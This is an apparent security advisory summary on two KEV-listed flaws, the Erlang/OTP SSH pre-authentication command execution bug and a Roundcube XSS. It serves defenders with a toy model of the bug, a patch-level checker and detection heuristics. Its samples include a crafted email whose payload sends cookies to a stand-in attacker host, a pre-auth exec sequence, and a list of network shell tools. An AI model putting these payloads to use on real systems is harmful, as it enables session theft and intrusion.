Full Report
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added two critical security flaws impacting Erlang/Open Telecom Platform (OTP) SSH and Roundcube to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The vulnerabilities in question are listed below - CVE-2025-32433 (CVSS score: 10.0) - A missing authentication for a critical
Analysis Summary
# Vulnerability: Critical Flaws in Erlang/OTP SSH and Roundcube Added to CISA KEV Catalog
## CVE Details
- CVE ID: CVE-2025-32433
- CVSS Score: 10.0 (Critical)
- CWE: Missing Authentication for Critical Function
- CVE ID: CVE-2024-42009
- CVSS Score: 9.3 (Critical)
- CWE: Cross-Site Scripting (XSS)
## Affected Systems
- **Products (CVE-2025-32433):** The `ssh` application shipped with Erlang/Open Telecom Platform (OTP), i.e. any SSH server built on it. Because `ssh` is a library, the flaw also reaches third-party products that embed OTP (Cisco, for one, published its own advisory), where the fix arrives through the vendor rather than through an OTP upgrade.
- **Versions (CVE-2025-32433):** All releases before OTP-27.3.3, OTP-26.2.5.11 and OTP-25.3.2.20 on the three maintained branches; older branches received no fix. (Note: the source cites Censys data putting the number of exposed Erlang SSH servers at 340.)
- **Products (CVE-2024-42009):** Roundcube Webmail
- **Versions (CVE-2024-42009):** 1.6.x before 1.6.8 and 1.5.x before 1.5.8.
## Vulnerability Description
**CVE-2025-32433 (Erlang/OTP SSH):** The SSH daemon in OTP's `ssh` application processed SSH connection-protocol messages (channel open and channel requests such as `exec`) before user authentication had completed. An unauthenticated remote attacker who can reach the listener can therefore open a session and request command execution without ever presenting credentials, running code with the privileges of the Erlang VM process; where the daemon runs as root, that is full host compromise. The CWE "missing authentication for a critical function" describes exactly this: the authentication step exists, but it is not enforced on the messages that matter.
**CVE-2024-42009 (Roundcube):** A cross-site scripting flaw in `program/actions/mail/show.php`, the code path that renders a message for viewing. Roundcube sanitizes HTML mail, but a post-sanitization transformation in this path (the "desanitization" issue) could undo part of that filtering, so attacker-controlled markup in a crafted message survives into the rendered page and runs JavaScript in the victim's browser with the authority of their webmail session. No interaction beyond opening the message is needed; from there the attacker can read and exfiltrate mail and contacts, capture session data, and send mail as the victim.
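The pre-authentication message handling described above, as an added illustration for this summary (it is not Erlang/OTP's `ssh` code; the two server classes, the `replay` helper and the attack sequence are constructed for the demo, while the message numbers are the real SSH constants from RFC 4250, 4252 and 4254). A dispatcher that switches on message type alone honours a channel `exec` request from a client that never sent a `USERAUTH_REQUEST`; one that gates connection-protocol messages on authentication state rejects the same sequence at the first channel message.

```python
"""Model of the bug class behind CVE-2025-32433: an SSH server that
dispatches connection-protocol messages before user authentication.

Added, simplified illustration for this summary; not Erlang/OTP's ssh
code.  Class names and the replay helper are hypothetical; the message
numbers are the real ones from RFC 4250 / 4252 / 4254."""

SSH_MSG_KEXINIT = 20
SSH_MSG_NEWKEYS = 21
SSH_MSG_USERAUTH_REQUEST = 50
SSH_MSG_USERAUTH_FAILURE = 51
SSH_MSG_USERAUTH_SUCCESS = 52
SSH_MSG_CHANNEL_OPEN = 90
SSH_MSG_CHANNEL_REQUEST = 98

# RFC 4250 reserves 80-127 for the connection protocol (RFC 4254), which is
# specified to run on top of a completed user authentication (RFC 4252).
CONNECTION_MSGS = set(range(80, 128))


class VulnerableServer:
    """Dispatches on message type only; the auth state is never consulted."""

    def __init__(self, valid_users):
        self.valid_users = valid_users      # {username: secret}, constructed
        self.authenticated = False
        self.executed = []                  # commands the server ran

    def handle(self, msg_type, payload=None):
        if msg_type == SSH_MSG_USERAUTH_REQUEST:
            user, secret = payload
            if self.valid_users.get(user) == secret:
                self.authenticated = True
                return SSH_MSG_USERAUTH_SUCCESS
            return SSH_MSG_USERAUTH_FAILURE
        if msg_type == SSH_MSG_CHANNEL_OPEN:
            return "channel-open-confirmation"
        if msg_type == SSH_MSG_CHANNEL_REQUEST:
            # payload is (request-type, argument); "exec" runs a command.
            # Nothing here checks self.authenticated: that is the bug.
            kind, arg = payload
            if kind == "exec":
                self.executed.append(arg)
                return "channel-success"
        return "ignored"


class HardenedServer(VulnerableServer):
    """Gates every connection-protocol message on the auth state."""

    def handle(self, msg_type, payload=None):
        if msg_type in CONNECTION_MSGS and not self.authenticated:
            # Model's choice: treat it as a protocol violation and drop the
            # connection rather than silently ignoring the message.
            raise ConnectionError(f"message {msg_type} before authentication")
        return super().handle(msg_type, payload)


def replay(server, messages):
    """Feed a (msg_type, payload) sequence to a server, stopping at the first
    disconnect.  Returns the list of (msg_type, response) pairs processed."""
    log = []
    for msg_type, payload in messages:
        try:
            log.append((msg_type, server.handle(msg_type, payload)))
        except ConnectionError as exc:
            log.append((msg_type, f"disconnect: {exc}"))
            break
    return log


# Constructed attack sequence: key exchange, then straight to exec with no
# SSH_MSG_USERAUTH_REQUEST at all.  Real exploits carry these as encrypted
# SSH packets after KEX; only the message types matter for this model.
PREAUTH_EXEC = [
    (SSH_MSG_KEXINIT, None),
    (SSH_MSG_NEWKEYS, None),
    (SSH_MSG_CHANNEL_OPEN, "session"),
    (SSH_MSG_CHANNEL_REQUEST, ("exec", "id > /tmp/pwned")),
]


def run_demo():
    """Replay the same sequence against both servers.  Returns
    (commands run by the vulnerable server, commands run by the hardened
    server, the hardened server's processing log)."""
    vuln = VulnerableServer({"admin": "hunter2"})
    replay(vuln, PREAUTH_EXEC)
    fixed = HardenedServer({"admin": "hunter2"})
    fixed_log = replay(fixed, PREAUTH_EXEC)
    return vuln.executed, fixed.executed, fixed_log


if __name__ == "__main__":
    ran_vuln, ran_fixed, log = run_demo()
    print("vulnerable server executed:", ran_vuln)
    print("hardened server executed:  ", ran_fixed)
    print("hardened server log:       ", log)
```

The point of the model is where the check lives: authentication state must be consulted in the dispatcher for every connection-protocol message, not only inside the user-auth handler. A legitimate client that sends `USERAUTH_REQUEST` first still gets its `exec` honoured by the hardened server.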
## Exploitation
- **Status (CVE-2025-32433):** Actively exploited (added to the CISA KEV catalog). Multiple proof-of-concept exploits are public (see References).
- **Complexity (CVE-2025-32433):** Low. A CVSS 3.1 base score of 10.0 is only reachable with AV:N/AC:L/PR:N/UI:N and changed scope, so no credentials, no user interaction and no special conditions are required; the public PoCs bear this out.
- **Attack Vector (CVE-2025-32433):** Network: any client that can complete an SSH key exchange with the listener.
- **Status (CVE-2024-42009):** Added to the CISA KEV catalog, which indicates active exploitation, though the source gives no details of the campaign. Earlier Roundcube XSS flaws have been abused by threat actors, so this fits an established pattern.
- **Complexity (CVE-2024-42009):** Low attack complexity, but user interaction is required: the victim must open the crafted message in Roundcube. The 9.3 score is consistent with a CVSS 3.1 vector of AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N.
- **Attack Vector (CVE-2024-42009):** Network, via a crafted e-mail delivered to the victim's mailbox; the attacker needs no account on the Roundcube instance.
## Impact
| Vulnerability | Confidentiality | Integrity | Availability |
| :--- | :--- | :--- | :--- |
| **CVE-2025-32433 (RCE)** | High (Full system compromise) | High (Full system compromise) | High (Service disruption/system compromise) |
| **CVE-2024-42009 (XSS)** | High (session/credential theft, reading and exfiltrating mail and contacts) | High (sending mail as the victim) | None (CVSS A:N; the effect is confined to the viewing user's browser session) |
## Remediation
### Patches
- **CVE-2025-32433:** Fixed in Erlang/OTP **OTP-27.3.3**, **OTP-26.2.5.11** and **OTP-25.3.2.20**, released in April 2025. Hosts on a branch older than OTP-25 have no fixed release and must move to a maintained branch; appliances that embed OTP need their vendor's update.
- **CVE-2024-42009:** Fixed in Roundcube **1.6.8** and **1.5.8**, released in August 2024.
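A patch-level check against the fixed versions listed above, covering both the affected-version lists and the patch list, as an added example for this summary rather than vendor tooling. The fixed versions are the ones stated in this report; how a scanner obtains the version string is an assumption recorded in the comments (the `OTP_VERSION` file under the release directory for Erlang, the `RCMAIL_VERSION` constant in Roundcube's `program/include/iniset.php`), and treating a branch newer than the newest fixed branch as patched is also an assumption.

```python
"""Patch-level check for the two products in this summary.

Added example for this summary, not vendor tooling.  FIXED holds the
fixed releases stated under Remediation; everything about how the version
strings are collected is an assumption."""

import re

# Fixed versions per maintained branch, keyed by the branch prefix.
FIXED = {
    "erlang-otp": {"27": (27, 3, 3), "26": (26, 2, 5, 11), "25": (25, 3, 2, 20)},
    "roundcube": {"1.6": (1, 6, 8), "1.5": (1, 5, 8)},
}

# Where the version string usually comes from (assumptions, not part of the
# report):
#   Erlang: the OTP_VERSION file in <otp-root>/releases/<major>/, e.g.
#     erl -noshell -eval '{ok,V}=file:read_file(filename:join([code:root_dir(),
#       "releases",erlang:system_info(otp_release),"OTP_VERSION"])),
#       io:format("~s",[V]), halt().'
#   Roundcube: define('RCMAIL_VERSION', '1.6.7') in program/include/iniset.php


def parse_version(raw):
    """'OTP-26.2.5.10' -> (26, 2, 5, 10); '1.6.7' -> (1, 6, 7).
    Product tags and suffixes such as '-rc1' are ignored.  Tuples compare
    numerically, which is the point: as strings, '26.2.5.9' > '26.2.5.11'."""
    m = re.search(r"\d+(?:\.\d+)*", raw)
    if not m:
        raise ValueError(f"no version number in {raw!r}")
    return tuple(int(p) for p in m.group(0).split("."))


def dotted(version_tuple):
    return ".".join(str(p) for p in version_tuple)


def branch_of(product, version):
    """Branch key whose components are a prefix of the version, or None."""
    for key in FIXED[product]:
        key_tuple = tuple(int(p) for p in key.split("."))
        if version[:len(key_tuple)] == key_tuple:
            return key
    return None


def assess(product, raw):
    """Return (status, detail) with status one of 'patched', 'vulnerable' or
    'unsupported-branch'.  An unsupported branch has no fixed release, so the
    only remediation is moving to a maintained branch: treat it as vulnerable."""
    version = parse_version(raw)
    branch = branch_of(product, version)
    if branch is None:
        newest_fix = max(FIXED[product].values())
        if version > newest_fix:
            # Assumption: a branch released after the newest fix carries it.
            return "patched", f"{raw}: branch newer than {dotted(newest_fix)}"
        return "unsupported-branch", f"{raw}: no fixed release for this branch"
    fixed = FIXED[product][branch]
    if version >= fixed:
        return "patched", f"{raw} >= {dotted(fixed)}"
    return "vulnerable", f"{raw} < {dotted(fixed)}"


if __name__ == "__main__":
    # Constructed inventory lines: (product, version string as collected).
    inventory = [
        ("erlang-otp", "OTP-26.2.5.10"), ("erlang-otp", "OTP-27.3.3"),
        ("erlang-otp", "OTP-24.3.4.17"), ("roundcube", "1.6.7"),
        ("roundcube", "1.5.8"),
    ]
    for product, raw in inventory:
        status, detail = assess(product, raw)
        print(f"{product:11} {status:19} {detail}")
```

Feed it whatever your inventory source yields (package manager output, the `OTP_VERSION` file, the Roundcube constant); the only product-specific knowledge is the `FIXED` table, so the same routine serves any advisory that fixes several branches at once.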
### Workarounds
- The source text gives no workaround beyond patching. Where an immediate OTP upgrade is not possible, exposure to CVE-2025-32433 can be reduced by stopping the Erlang SSH daemon if it is not needed, or by restricting reachability of its listening port to trusted management networks with firewall rules; these measures limit exposure and are not a substitute for the fix. Given that the flaw is unauthenticated remote code execution with public exploits, immediate patching is strongly recommended. Federal Civilian Executive Branch (FCEB) agencies are required under BOD 22-01 to remediate by June 30, 2025.
## Detection
- **Indicators of Compromise (IOCs):** None are given in the source. For CVE-2025-32433, note that SSH traffic after key exchange is encrypted, so network sensors cannot see that a client sent channel-open or `exec` messages without authenticating; what they do see is who connected to the Erlang SSH listener and when, so alert on connections from unexpected sources and review those hosts. On the host, look for processes spawned by the Erlang VM (`beam.smp`) that the application does not normally start, for files written by the VM's user that it has no reason to write, and for the Erlang `ssh` daemon's own logging where it is enabled. For CVE-2024-42009, `program/actions/mail/show.php` is a source file, not a URL: Roundcube routes message views through `index.php` with `_task=mail&_action=show`, and the request that triggers the payload is the victim's own, so web server logs are of little use. Evidence lives in the mail store and MTA logs (the crafted HTML message itself) and, after exploitation, in outbound requests from the victim's browser to attacker-controlled hosts and in sent mail the user did not author.
- **Detection Methods and Tools:** KEV inclusion obliges FCEB agencies to remediate by the due date under BOD 22-01 and is a strong prioritisation signal for everyone else; the first control is an inventory of hosts running the affected OTP and Roundcube releases, including embedded appliances. For ongoing monitoring, pair network visibility of the Erlang SSH listener with host telemetry (process creation, file integrity) on those servers, and pass HTML mail through content inspection before it reaches Roundcube users.
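Two host-side triage heuristics for the detection notes above, added for this summary and not vendor detections: a process-event filter for code execution that lands inside the Erlang VM, and a scan of HTML e-mail parts for script-bearing constructs. The event schema, the process names and both sample messages are constructed. The mail scan catches commodity payloads and exfiltration indicators, not the specific sanitizer bypass behind CVE-2024-42009, which by definition passes Roundcube's own filter; and exploits of CVE-2025-32433 that only use Erlang built-ins spawn no child process, so the process filter needs file-integrity monitoring beside it.

```python
"""Two triage heuristics for the detection notes in this summary.

Added examples, not vendor detections.  The event schema, process names and
the two sample messages are constructed for the demo."""

import email
import re
from email import policy

# --- CVE-2025-32433: execution lands inside the Erlang VM --------------------
# The VM's OS process is beam.smp (or beam).  A shell or network utility
# spawned directly by it is unusual for most deployments and is a cheap first
# filter.  Payloads that stay inside Erlang (e.g. file:write_file/2) spawn
# nothing, so pair this with file-integrity monitoring on the host.
ERLANG_VM = {"beam.smp", "beam"}
SUSPICIOUS_CHILDREN = {"sh", "bash", "dash", "curl", "wget", "nc", "ncat",
                       "python3", "perl"}


def flag_processes(events):
    """events: iterable of dicts with 'parent' and 'exe' basenames (constructed
    schema; map your EDR or auditd fields onto it).  Returns flagged events."""
    return [e for e in events
            if e["parent"] in ERLANG_VM and e["exe"] in SUSPICIOUS_CHILDREN]


# Constructed process-creation events.  epmd and inet_gethost are legitimate
# children of the VM and must not fire.
PROCESS_EVENTS = [
    {"pid": 4101, "parent": "beam.smp", "exe": "sh",
     "cmdline": "sh -c 'id > /tmp/pwned'"},
    {"pid": 4102, "parent": "beam.smp", "exe": "epmd", "cmdline": "epmd -daemon"},
    {"pid": 4103, "parent": "sshd", "exe": "bash", "cmdline": "-bash"},
    {"pid": 4104, "parent": "beam.smp", "exe": "inet_gethost",
     "cmdline": "inet_gethost 4"},
]

# --- CVE-2024-42009: the payload is an HTML e-mail ---------------------------
# Generic script-bearing constructs for mail-store or quarantine triage; not a
# signature for the sanitizer bypass itself.
HTML_PATTERNS = {
    "script-tag": re.compile(r"<\s*script\b", re.I),
    "event-handler": re.compile(r"\son[a-z]+\s*=", re.I),
    "javascript-uri": re.compile(r"(?:href|src|action)\s*=\s*['\"]?\s*javascript:", re.I),
    "srcdoc": re.compile(r"\bsrcdoc\s*=", re.I),
    "svg-or-math": re.compile(r"<\s*(?:svg|math|foreignObject)\b", re.I),
}


def scan_eml(raw_bytes):
    """Parse an RFC 5322 message and return the sorted names of the patterns
    hit by any of its text/html parts (empty list when nothing matches)."""
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)
    hits = set()
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        body = part.get_content()          # decoded str under policy.default
        for name, pattern in HTML_PATTERNS.items():
            if pattern.search(body):
                hits.add(name)
    return sorted(hits)


# Constructed sample messages.
BENIGN_EML = b"""From: alice@example.com
To: bob@example.com
Subject: Lunch
Content-Type: text/html; charset=utf-8

<html><body><p>Lunch at <b>noon</b>?</p></body></html>
"""

SUSPECT_EML = b"""From: attacker@example.net
To: bob@example.com
Subject: Invoice
Content-Type: text/html; charset=utf-8

<html><body><img src=x onerror="fetch('https://attacker.example/'+document.cookie)">
<a href="javascript:alert(1)">open</a></body></html>
"""


if __name__ == "__main__":
    for e in flag_processes(PROCESS_EVENTS):
        print("suspicious child of Erlang VM:", e["pid"], e["cmdline"])
    print("benign message hits: ", scan_eml(BENIGN_EML))
    print("suspect message hits:", scan_eml(SUSPECT_EML))
```

Run `scan_eml` over exported `.eml` files from the mail store or an MTA quarantine to shortlist messages for manual review; tune `SUSPICIOUS_CHILDREN` to what the Erlang application on the host legitimately spawns before alerting on `flag_processes`.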
## References
- CISA KEV Catalog Update: hxxps://www.cisa.gov/news-events/alerts/2025/06/09/cisa-adds-two-known-exploited-vulnerabilities-catalog
- CVE-2025-32433 Disclosure: hxxps://thehackernews.com/2025/04/critical-erlangotp-ssh-vulnerability.html
- CVE-2024-42009 Disclosure: hxxps://thehackernews.com/2024/08/roundcube-webmail-flaws-allow-hackers.html
- CVE-2025-32433 PoC: hxxps://github.com/ProDefense/CVE-2025-32433
- CVE-2025-32433 PoC (Alternate): hxxps://platformsecurity.com/blog/CVE-2025-32433-poc